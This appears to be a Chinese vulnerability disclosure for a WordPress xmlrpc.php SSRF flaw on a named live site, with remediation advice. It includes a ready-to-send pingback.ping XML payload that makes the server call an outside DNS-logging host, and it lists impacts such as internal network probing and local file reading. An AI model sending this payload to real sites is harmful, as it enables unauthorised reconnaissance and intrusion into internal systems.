WordPress xmlrpc.php 存在SSRF漏洞

漏洞证明

xmlrpc.php 存在SSRF漏洞 漏洞地址:http://baijie.joowp.com/xmlrpc.php 验证方法:

 

POST http://baijie.joowp.com/xmlrpc.php
<?xml version="1.0" encoding="iso-8859-1"?>
    <methodCall>
    <methodName>pingback.ping</methodName>
    <params>
    <param><value><string>http://qxotxt.s0x.cn/</string></value></param>
    <param><value><string>http://baijie.joowp.com//?p=1</string></value></param>
    </params>
    </methodCall>

匹配内容:

查询到DNS请求: qxotxt.s0x.cn,说明漏洞存在
造成的影响

1、可以对业务内网进行探测。 2、攻击运行在内网或本地的应用程序(比如溢出攻击)。 3、利用file协议读取本地文件等。

安全建议

通过.htaccess屏蔽xmlrpc.php文件的访问 # protect xmlrpc Order Deny,Allow Deny from all 删除根目录下的xmlrpc.php。

技术参考

https://help.aliyun.com/knowledge_detail/42198.html